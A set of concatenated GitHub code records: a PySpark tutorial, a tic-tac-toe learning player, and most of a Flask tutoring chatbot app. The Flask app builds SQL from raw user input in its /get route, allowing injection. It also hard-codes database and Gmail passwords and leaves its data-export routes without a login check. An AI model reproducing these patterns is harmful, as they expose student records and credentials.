JOKE_CHOICE_INTERVAL: float = 1.0\n\n\ndef get_settings() -> Settings:\n settings = Settings()\n _check_settings(settings)\n\n return Settings()\n\n\ndef _check_settings(settings: Settings) -> None:\n logger.debug(\"Проверяем настройки\")\n\n if not settings.TG_API_ID:\n print(\"Укажите api_id в переменной окружения TG_API_ID\")\n exit(1)\n logger.debug(\"TG_API_ID указан\")\n\n if not settings.TG_API_HASH:\n print(\"Укажите api_hash в переменной окружения TG_API_HASH\")\n exit(1)\n logger.debug(\"TG_API_HASH указан\")\n\n logger.debug(\"Настройки заданы корректно\")\n","repo_name":"StanislavBeskaev/UserBotTelegram","sub_path":"app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"188836286","text":"# #### Saving PySpark DataFrames\n# Once you’ve done some analysis, the next step is often saving the transformed data back to disk for others to use. In this final topic, we’re going to cover how to efficiently save PySpark DataFrames.\n# \n# Similar to the SparkSession.read() method, Spark offers a SparkSession.write() method. Let’s perform a slight modification to our original Wikipedia views dataset and save it to disk. This code just uses .select() to select all columns except the monthly_count column (recall that earlier we discovered this column only contains zeros).\n# \n# Because Spark runs all operations in parallel, it’s typical to write DataFrames to a directory of files rather than a single CSV file. In the example below, Spark will split the underlying dataset and write multiple CSV files to cleaned/csv/views_2022_01_01_000000/. We can also use the mode argument of the .csv() method to overwrite any existing data in the target directory.\n# \n# hrly_views_df\\\n# .select(['language_code', 'article_title', 'hourly_count'])\\\n# .write.csv('cleaned/csv/views_2022_01_01_000000/', mode=\"overwrite\")\n# Using SparkSession.read(), we can read the data from disk and confirm that it looks the same as the DataFrame we saved.\n# \n# ##### Read DataFrame back from disk\n# hrly_views_df_restored = spark.read\\\n# .csv('cleaned/csv/views_2022_01_01_000000/')\n# hrly_views_df_restored.printSchema()\n# root\n# |-- _c0: string (nullable = true)\n# |-- _c1: string (nullable = true)\n# |-- _c2: string (nullable = true)\n# Close, but not quite! It looks like this file didn’t retain information about column headers or datatypes. Unfortunately, there’s no way for a CSV to retain information about its format. Each time we read it, we’ll need to tell Spark exactly how it must be processed.\n# \n# Luckily, there is a file format called “Parquet” that’s specially designed for big data and solves this problem among many others. Parquet offers efficient data compression, is faster to perform analysis on than CSV, and preserves information about a dataset’s schema. Let’s try saving and re-reading this file to and from Parquet instead.\n# \n# ##### Write DataFrame to Parquet\n# hrly_views_slim_df\n# .write.parquet('cleaned/parquet/views_2022_01_01_000000/', mode=\"overwrite\")\n# \n# ##### Read Parquet as DataFrame\n# hrly_views_df_restored = spark.read\\\n# .parquet('cleaned/parquet/views_2022_01_01_000000/')\n# \n# ##### Check DataFrame's schema\n# hrly_views_df_restored.printSchema()\n# root\n# |-- language_code: string (nullable = true)\n# |-- article_title: string (nullable = true)\n# |-- hourly_count: integer (nullable = true)\n# Great, now anyone who wants to query this data can do so with the much more efficient Parquet data format!\n\n\nfrom pyspark.sql import SparkSession\n\n# Create a new SparkSession\nspark = SparkSession\\\n .builder\\\n .config('spark.app.name', 'learning_spark_sql')\\\n .getOrCreate()\n\n# Read in Wikipedia Unique Visitors Dataset\nwiki_uniq_df = spark.read\\\n .option('header', True) \\\n .option('delimiter', ',') \\\n .option('inferSchema', True) \\\n .csv(\"wiki_uniq_march_2022.csv\")\n\n# Run the code to create a new DataFrame with only domain and uniq_human_visitors.\n# select only domain and uniq_human visitors\nuniq_human_visitors_df = wiki_uniq_df\\\n .select('domain', 'uniq_human_visitors')\n\n# show the new DataFrame\nuniq_human_visitors_df.show()\n\"\"\"\n\n+------------------+-------------------+\n| domain|uniq_human_visitors|\n+------------------+-------------------+\n|en.m.wikipedia.org| 33261399|\n| en.wikipedia.org| 17009339|\n|es.m.wikipedia.org| 5668575|\n|ru.m.wikipedia.org| 5816762|\n|ja.m.wikipedia.org| 5396108|\n|de.m.wikipedia.org| 4439596|\n|fr.m.wikipedia.org| 3798528|\n| ru.wikipedia.org| 2852296|\n| es.wikipedia.org| 2460489|\n|it.m.wikipedia.org| 2806943|\n| de.wikipedia.org| 2252670|\n| ja.wikipedia.org| 2128471|\n| fr.wikipedia.org| 1839196|\n|zh.m.wikipedia.org| 2123391|\n|ar.m.wikipedia.org| 1644253|\n|pt.m.wikipedia.org| 1471752|\n|pl.m.wikipedia.org| 1410339|\n|fa.m.wikipedia.org| 1194940|\n| zh.wikipedia.org| 1088755|\n|tr.m.wikipedia.org| 908573|\n+------------------+-------------------+\nonly showing top 20 rows\"\"\"\n\n# Save the new DataFrame as CSV files.\nuniq_human_visitors_df\\\n .write.csv('./results/csv/uniq_human_visitors/', mode=\"overwrite\")\n\n# Save the new DataFrame as Parquet files.\nuniq_human_visitors_df\\\n .write.parquet('./results/pq/uniq_human_visitors/', mode=\"overwrite\")","repo_name":"muyiwao/PySparkPractises","sub_path":"CodeAcademyPractise/13_Saving_PySpark_DF.py","file_name":"13_Saving_PySpark_DF.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8921130425","text":"from core import *\nfrom .Memory import Memory\n\nclass HAL1Player(Player):\n \"\"\"\n Subclass of Player, first try of learning player.\n\n Attributes\n ----------\n memories: Memory\n Advanced dictionary that registers the past games.\n saveGame: bool\n Indicates if the game must be saved or not (True by default, set to False if the game is known).\n nbOfIntelligentGame: int\n The number of game where the memory have been used.\n evolutionOfMemories: list of int\n The lengths of the memory, one entry added at the end hof each game.\n \"\"\"\n def __init__(self, game, board):\n super().__init__(game, board)\n self.memories = Memory()\n self.saveGame = True\n self.nbOfIntelligentGame = 0 # used for statistics purposes\n self.evolutionOfMemories = [] # used to record the evolution of the length of the memories' dict\n\n def play(self):\n \"\"\"\n Play a first random movement and then tries to play intelligently\n\n Intelligently means it recognises learned the boardStates that leads to direct victory (in one movement)\n and plays the winning movement --- not so intelligent but self learning !\n \"\"\"\n # random movement for the first turn\n if self.game.turn <= 2:\n self.randomPlay()\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: beginning random\")\n\n # if the boardState is known, the wining movement is played\n elif self.game.boardAR.boardS in self.memories.pastGames:\n place = self.memories.pastGames[self.game.boardAR.boardS]\n mvt = Movement(self, place)\n self.boardAR.play(mvt)\n\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: intelligent !\")\n\n self.nbOfIntelligentGame += 1\n self.saveGame = False\n # else a random movement is played\n else:\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: not the beginning but random !\")\n self.randomPlay()\n\n def endOfGame(self):\n \"\"\"\n Record the game if it is not an already know game\n\n This function is called when a game is over, it relies on self.saveGame to know if the game must be learn\n or not. If it is the case, memories.addGame(game) is called.\n Reset self.saveGame to True at the end.\n Manages self.evolutionOfMemories\n \"\"\"\n # calls the parent's method (that registers the statistics)\n super(HAL1Player, self).endOfGame()\n\n # print info if wanted\n if self.game.interactionLevel.showPlayerDebug:\n print(\"HAL1: EOG, saveGame:\", self.saveGame)\n\n # if the game is not knows (saveGame == True) and is not even (winner != None)\n # the game is learnt\n if self.saveGame and self.game.winner is not None:\n self.memories.addGame(self.game)\n\n # reset of self.saveGame (must not be forgotten !)\n self.saveGame = True\n\n # Add the length of the memory\n self.evolutionOfMemories.append(len(self.memories.pastGames))\n\n def openTraining(self, trainingFileName):\n \"\"\" Imports a trained memories dictionary \"\"\"\n import pickle\n with open(trainingFileName, 'rb') as f:\n self.memories.pastGames = pickle.load(f)\n\n def saveTraining(self, trainingFileName):\n \"\"\" Saves a trained memories dictionary \"\"\"\n import pickle\n with open('trainingHAL1.pickle', 'wb') as f:\n pickle.dump(self.memories.pastGames, f, pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == '__main__':\n print([[] for i in range(10)])\n","repo_name":"deterralba/tictactoe","sub_path":"source/players/HAL1Player.py","file_name":"HAL1Player.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29467891023","text":"from flask import Flask\nfrom flask import render_template, Response, request, session\nfrom datetime import timedelta\nfrom flaskext.mysql import MySQL\nfrom werkzeug.utils import redirect\nfrom functools import wraps\nfrom flask_mail import Mail, Message\nfrom io import TextIOWrapper\nimport secrets\nimport io\nimport xlwt\nimport re\nimport queue\nimport random\nimport csv\n\n\napp = Flask(__name__)\n#With os\n#os.random(24)\napp.config['SECRET_KEY'] = 'secret-key:)'\nmysql= MySQL()\napp.config['MYSQL_DATABASE_HOST']='localhost'\napp.config['MYSQL_DATABASE_USER']='root'\napp.config['MYSQL_DATABASE_PASSWORD']='Password123*'\napp.config['MYSQL_DATABASE_DB']='tutorias'\nmysql.init_app(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'holasoysolarelbot@gmail.com'\napp.config['MAIL_PASSWORD'] = 'zyyywjwgqtbbtswm'\napp.config['MAIL_USE_SSL'] = True\nmail = Mail(app)\nq = queue.Queue()\n\n\nanswers = [\n \"¡Por supuesto!😄\\n\",\n \"Of course!🤪\\n\",\n \"E-N S-E-G-U-I-D-A...🤖\\n\",\n \"'Yes' en Inglés 🧾(Jobs😉)\\n\",\n \"I'm coming!👀\\n\",\n \"¡Claro!🤓\\n\",\n \"🧐¡Enseguida!\\n\",\n \"Buscando...🔍\\t ¡Aquí está!🤓\\n\",\n \"Searching...🔍\\t Check it out!🤓\\n\",\n]\n\n\nwithout_answers=[\n \"No tengo esa información😰\\n\",\n \"No lo encuentro en mi base de datos😱\\n\",\n \"🤨I don't understand you\\n\",\n \"Hmmm, I don't know😧\\n You could send your question below📫\",\n \"No entiendo😖\\n Puedes mandar correo con tu pregunta y pronto estará aquí🤓\",\n \"Uy, no tengo respuesta para ello😶\\n ¡Sugiere la pregunta aquí abajo!👇\",\n \"No cuento con esa información😓\\n Si quieres ver tu respuesta, ¡Sugiere una pregunta!🤓\",\n \"No te lo vengo manejando, joven🤠\\n ¡Deberías sugerir la pregunta!\",\n]\n\ndef admin_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'pwd' in session:\n return f(*args, **kwargs)\n else:\n return render_template('handling/error/expired-session.html')\n return wrap\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'studentCode' in session:\n return f(*args, **kwargs)\n else:\n return render_template('handling/error/expired-session.html')\n return wrap\n\n\n@app.route('/solar')\n@app.route('/chatbot')\n@login_required\ndef index():\n return render_template('student/index.html')\n\n@app.route('/login')\ndef login():\n return render_template('student/login.html')\n\n@app.route('/keywords')\n@login_required\ndef keywords():\n return render_template('student/keywords.html')\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route('/select')\ndef select():\n return render_template('select.html')\n\n@app.route('/suggest')\n@login_required\ndef suggest():\n return render_template('student/suggest.html')\n\n@app.route('/master-login')\ndef master_login():\n return render_template('tutor/login.html')\n\n@app.route('/new-question')\n@admin_required\ndef new_question():\n return render_template('tutor/new-question.html')\n\n@app.route('/new-student')\n@admin_required\ndef new_student():\n return render_template('tutor/new-student.html')\n\n@app.route('/new-tutor')\n@admin_required\ndef new_tutor():\n return render_template('tutor/new-tutor.html')\n\n\n@app.route('/upload-questions')\n@admin_required\ndef upload():\n return render_template('tutor/upload-questions.html')\n\n@app.route('/updated')\ndef updated():\n return render_template('handling/sucess/updated.html')\n\n@app.route('/created')\ndef created():\n return render_template('handling/sucess/created.html')\n\n@app.route('/error-update')\ndef error_update():\n return render_template('handling/error/error-update.html')\n\n@app.route('/error-save')\ndef error_save():\n return render_template('handling/error/error-save.html')\n\n\n\n#Handling Errors\n\n@app.errorhandler(400)\ndef handle_bad_request(e):\n return render_template('handling/error/error-400.html'), 400\n\n@app.errorhandler(403)\ndef handle_bad_request(e):\n return render_template('handling/error/error-400.html'), 403\n\n@app.errorhandler(404)\ndef not_found(self):\n return render_template('handling/error/error-404.html'), 404\n\n@app.errorhandler(500)\ndef internal_error(error):\n return render_template('handling/error/error-500.html'), 500\n\n@app.errorhandler(405)\ndef method_not_found(error):\n return render_template('handling/error/error-405.html'), 405\n\n@app.route('/error-500')\ndef error_500():\n return render_template('handling/error/error-500.html')\n\n@app.route('/error-405')\ndef error_405():\n return render_template('handling/error/error-405.html')\n\n@app.route('/error-400')\ndef error_400():\n return render_template('handling/error/error-400.html')\n''''\n@app.route('/error-form')\ndef error_form():\n return render_template('handling/error/error-form.html')\n'''\n\n@app.route('/download/report/excel/tutor-and-student')\ndef download_report():\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Tutor and Student Report')\n\n #add headers\n sh.write(0, 0, 'Id del Tutor')\n sh.write(0, 1, 'Nombre del tutor')\n sh.write(0, 2, 'Correo de Tutor')\n sh.write(0, 3, 'Id de la carrera')\n sh.write(0, 4, 'Carrera')\n sh.write(0, 5, 'Id del alumno')\n sh.write(0, 6, 'Nombre de alumno')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, str(row[0]))\n sh.write(idx+1, 1, row[1])\n sh.write(idx+1, 2, row[2])\n sh.write(idx+1, 3, str(row[3]))\n sh.write(idx+1, 4, row[4])\n sh.write(idx+1, 5, str(row[5]))\n sh.write(idx+1, 6, row[6])\n idx += 1\n\n workbook.save(output)\n output.seek(0)\n\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Tutor_&_Estudiante.xls\"})\n\n\n@app.route('/download/report/excel/tutors')\ndef download_report_tutors():\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Tutors Report')\n\n #add headers\n sh.write(0, 0, 'Nombre')\n sh.write(0, 1, 'Correo')\n sh.write(0, 2, 'Carrera')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[4])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Tutores.xls\"})\n\n@app.route('/download/report/excel/students')\ndef download_report_students():\n sql = \"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Students Report')\n\n #add headers\n sh.write(0, 0, 'Nombre')\n sh.write(0, 1, 'Correo')\n sh.write(0, 2, 'Código')\n sh.write(0, 3, 'Carrera')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[3])\n sh.write(idx+1, 3, row[5])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Estudiantes.xls\"})\n\n\n@app.route('/download/report/excel/questions')\ndef download_report_questions():\n sql = \"SELECT preguntas.id_pregunta, preguntas.pregunta, preguntas.respuesta, keyword, etapas.etapa FROM preguntas JOIN etapas ON preguntas.id_etapa = etapas.id_etapa\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n #output in bytes\n output = io.BytesIO()\n #create WorkBook object\n workbook = xlwt.Workbook()\n #add a sheet\n sh = workbook.add_sheet('Questions Report Solar')\n #add headers\n sh.write(0, 0, 'Pregunta')\n sh.write(0, 1, 'Respuesta')\n sh.write(0, 2, 'Palabra Clave')\n sh.write(0, 3, 'Etapa')\n idx = 0\n for row in data:\n sh.write(idx+1, 0, row[1])\n sh.write(idx+1, 1, row[2])\n sh.write(idx+1, 2, row[3])\n sh.write(idx+1, 3, row[4])\n idx += 1\n workbook.save(output)\n output.seek(0)\n return Response(output, mimetype=\"application/ms-excel\", headers={\"Content-Disposition\":\"attachment;filename=Preguntas_Solar.xls\"})\n\n@app.route('/importing/questions', methods=['GET', 'POST'])\ndef importing_questions():\n if request.method == 'POST':\n csv_file = request.files['csvfile']\n csv_file = TextIOWrapper(csv_file, encoding='utf-8')\n csv_reader = csv.reader(csv_file)\n connection = mysql.connect()\n cursor = connection.cursor()\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n for row in csv_reader:\n cursor.execute(sql,row)\n connection.commit()\n return \"ok\"\n return \"no\"\n\n@app.route(\"/sending-email\", methods=['POST','GET'])\n@login_required\ndef sending_email():\n body = request.form['body']\n name = request.form['name']\n if request.method == \"POST\" and body and name:\n msg = Message(\"¡Nueva Pregunta Sugerida!\", sender= 'holasoysolarelbot@gmail.com',recipients= [\"holasoysolarelbot@gmail.com\"])\n msg.body = \"¡Hola, Administrador!\\n¡Un alumno ha enviado una nueva sugerencia!\\nNombre: \"+name+\"\\nPregunta: \"+request.form.get(\"body\")+\"\\n¡Chécalo aquí!:\"+\"http://127.0.0.1:5000/emails\"\n with app.open_resource(\"static/images/character/new-suggest.jpeg\") as fp:\n msg.attach(\"new-suggest.jpeg\", \"image/jpeg\", fp.read())\n mail.send(msg)\n connection = mysql.connect()\n cursor = connection.cursor()\n sql = \"INSERT INTO `sugerencias` (`id_email`, `name`, `message`, `status`) VALUES (NULL, %s, %s,'Pendiente');\"\n data = (name,body)\n cursor.execute(sql,data)\n connection.commit()\n return render_template(\"student/result-email.html\", result=\"¡Sugerencia Enviada!\")\n else:\n return render_template(\"student/result-email.html\", result=\"Error, intenta nuevamente\")\n\n@app.route('/tutor-and-student')\n@admin_required\ndef tutor_and_student():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/tutor-and-student.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/emails')\n@admin_required\ndef emails():\n try:\n sql = \"SELECT * FROM sugerencias\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/emails.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/validate-suggest//')\n@admin_required\ndef validate_suggest(id):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM sugerencias WHERE id_email=%s\",(id))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-suggest.html', data = data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/storing-suggest', methods=['POST'])\n@admin_required\ndef storing_suggest():\n try:\n id_email = request.form['id_email']\n name = request.form['name']\n suggest = request.form['suggest']\n question = request.form['question']\n answer = request.form['answer']\n stage = request.form['stage']\n keyword = request.form['keyword']\n status = request.form['status']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and question and answer and suggest and status and id_email and stage and keyword and status and request.method == 'POST':\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n data = (question, answer, keyword, stage)\n cursor.execute(sql,data)\n connection.commit()\n connection.close()\n else:\n return render_template('handling/error/error-save.html')\n if id_email:\n connection = mysql.connect()\n cursor = connection.cursor()\n sql1 = \"UPDATE sugerencias SET status = %s WHERE sugerencias.id_email =%s\"\n data =(status,id_email)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql1,data)\n connection.commit()\n connection.close()\n else:\n return render_template('handling/error/error-save.html')\n return render_template('handling/sucess/created.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-save.html')\n\n\n@app.route('/tutors')\n@admin_required\ndef tutors():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/tutors.html', data=data)\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-form.html')\n\n@app.route('/edit-tutor///')\n@admin_required\ndef edit_tutor(id_tutor,id_career):\n try:\n if session['pwd'] != session:\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT tutores.id_tutor, tutores.nombre, tutores.correo, carreras.id_carrera, carreras.nombre AS carreras FROM tutores INNER JOIN carreras ON tutores.id_carrera = carreras.id_carrera WHERE tutores.id_tutor=%s AND tutores.id_carrera=%s\",(id_tutor,id_career))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-tutor.html', data=data)\n except Exception as e:\n print(e)\n return render_template('handling/error/error-edit-tutor.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n\n@app.route('/edit-students///')\n@admin_required\ndef edit_students(id_student,id_career):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera WHERE alumnos.id_alumno =%s AND alumnos.id_carrera = %s;\",(id_student,id_career))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('handling/error/error-form.html')\n return redirect('/error-form')\n\n@app.route('/students')\n@admin_required\ndef students():\n try:\n sql = \"SELECT alumnos.id_alumno, alumnos.nombre, alumnos.correo, alumnos.codigo, carreras.id_carrera, carreras.nombre AS carreras FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera;\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('handling/error/error-form.html')\n return redirect('/error-form')\n\n@app.route('/edit-tutor-and-student.html')\n@admin_required\ndef edit_tutor_and_student():\n try:\n sql = \"SELECT tutores.id_tutor, tutores.nombre, tutores.correo,carreras.id_carrera, carreras.nombre AS carrera, alumnos.id_alumno, alumnos.nombre AS alumnos FROM alumnos INNER JOIN carreras ON alumnos.id_carrera = carreras.id_carrera INNER JOIN tutores ON alumnos.id_tutor = tutores.id_tutor\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n cursor.fetchone()\n connection.commit()\n return render_template('tutor/students.html', data=data)\n except KeyError as e:\n print(e)\n return redirect('handling/error/error-form.html')\n return redirect('/error-form')\n\n@app.route('/form')\n@admin_required\ndef form():\n try:\n try:\n sql = \"SELECT preguntas.id_pregunta, preguntas.pregunta, preguntas.respuesta, keyword, etapas.etapa FROM preguntas JOIN etapas ON preguntas.id_etapa = etapas.id_etapa\";\n connection= mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/form.html', data=data)\n except mysql.connector.Error as err:\n print(err)\n return redirect('handling/error/error-form.html')\n except KeyError as e:\n print(e)\n return redirect('handling/error/error-form.html')\n\n\n@app.route('/edit-question/')\n@admin_required\ndef edit_question(id):\n try:\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM preguntas WHERE id_pregunta=%s\",(id))\n data = cursor.fetchall()\n connection.commit()\n return render_template('tutor/edit-question.html', data = data)\n except KeyError as e:\n print(e)\n return \"Error\"\n\n\n@app.route('/update', methods=['POST'])\n@admin_required\ndef update():\n try:\n id_question = request.form['id']\n question = request.form['pregunta']\n answer = request.form['respuesta']\n keyword = request.form['keyword']\n stage = request.form['stage']\n if id_question and question and answer and keyword and stage and request.method == 'POST':\n sql = \"UPDATE preguntas SET pregunta=%s,respuesta=%s,keyword=%s, id_etapa=%s WHERE id_pregunta=%s;\"\n data =(question,answer,keyword,stage,id_question)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n row = cursor.fetchone()\n return render_template('handling/sucess/updated.html')\n else:\n return render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-update.html')\n\n@app.route('/update-tutor', methods=['POST'])\n@admin_required\ndef update_tutor():\n try:\n tutor_id = request.form['tutor_id']\n tutor_name = request.form['tutor_name']\n tutor_email = request.form['tutor_email']\n tutor_career = request.form['tutor_career']\n if tutor_id and tutor_name and tutor_email and tutor_career and request.method == 'POST':\n sql = \"UPDATE `tutores` SET `nombre` = %s, `correo` =%s, `id_carrera` = %s WHERE `tutores`.`id_tutor` = %s;\"\n data =(tutor_name,tutor_email,tutor_career,tutor_id)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n row = cursor.fetchone()\n return render_template('handling/sucess/updated.html')\n else:\n return render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return render_template('handling/error/error-update.html')\n return \"Error\"\n\n@app.route('/update-students', methods=['POST'])\n@admin_required\ndef update_students():\n try:\n id_student= request.form['id_student']\n id_career= request.form['id_career']\n name_student = request.form['name_student']\n email_student = request.form['email_student']\n code_student = request.form['code_student']\n career_student = request.form['career_student']\n if id_student and id_career and name_student and email_student and code_student and career_student and request.method == 'POST':\n sql = \"UPDATE alumnos SET nombre = %s,correo = %s, codigo =%s, id_carrera =%s WHERE alumnos.id_alumno =%s\"\n data =(name_student,email_student,code_student,id_career,id_student)\n connection = mysql.connect()\n cursor = connection.cursor()\n cursor.execute(sql,data)\n connection.commit()\n row = cursor.fetchone()\n return render_template('handling/sucess/updated.html')\n else:\n return render_template('handling/error/error-update.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n return \"Error\"\n\n#Chatbot\n@app.route('/get')\ndef get():\n userText = request.args.get('msg')\n if userText == \"hola\":\n return str(\"¡Hola, soy Solar!☀️🤖\\n Estoy a tus órdenes😊\")\n if re.match(\"^[0-9]{9}$\", userText):\n connection = mysql.connect()\n cursor=connection.cursor()\n row = cursor.execute(\"SELECT tutores.nombre from tutores join alumnos on tutores.id_tutor = alumnos.id_tutor where alumnos.codigo ='\"+userText+\"'\")\n connection.commit()\n data = cursor.fetchall()\n if row == 1:\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\"'\",\"\").replace(\"\\\\n\",\" \").replace(\"\\\\r\",\" \").replace(\"\\\\\",\" \")\n result = result.replace(\",\",\" \")\n return \"Claro, tu tutor/tutora es: \"+result\n else:\n return \"No encontramos tu tutor, intenta nuevamente\"\n connection = mysql.connect()\n cursor=connection.cursor()\n row = cursor.execute(\"SELECT respuesta FROM preguntas WHERE keyword='\"+userText+\"'\")\n connection.commit()\n data = cursor.fetchall()\n print(data)\n if row == 1:\n result = \" \".join(str(x) for x in data)\n result = result.replace(\"(\",\"\").replace(\")\",\"\").replace(\"'\",\"\").replace(\"\\\\n\",\" \").replace(\"\\\\r\",\" \").replace(\"\\\\\",\" \")\n result = result.replace(\",\",\" \")\n print(result)\n answer = random.choice(answers)\n return answer+result\n withoutanswer = random.choice(without_answers)\n return withoutanswer\n\n@app.route('/storage', methods=['POST'])\n@admin_required\ndef storage():\n try:\n question = request.form['pregunta']\n answer = request.form['respuesta']\n keyword = request.form['keyword']\n stage = request.form['stage']\n connection = mysql.connect()\n cursor = connection.cursor()\n if question and answer and keyword and stage and request.method == 'POST':\n sql = \"INSERT INTO `preguntas` (`id_pregunta`, `pregunta`, `respuesta`, `keyword`, `id_etapa`) VALUES (NULL, %s, %s, %s, %s);\"\n data = (question, answer, keyword, stage)\n cursor.execute(sql,data)\n connection.commit()\n return render_template('handling/sucess/created.html')\n else:\n return render_template('handling/error/error-save.html')\n except KeyError as e:\n print(e)\n return \"Error\"\n\n@app.route('/storage-tutor', methods=['POST'])\n@admin_required\ndef storage_tutor():\n try:\n name = request.form['name']\n email = request.form['email']\n career = request.form['career']\n connection = mysql.connect()\n cursor = connection.cursor()\n if name and email and career and request.method == 'POST':\n sql = \"INSERT INTO `tutores` (`id_tutor`, `nombre`, `correo`, `id_carrera`) VALUES (NULL,%s, 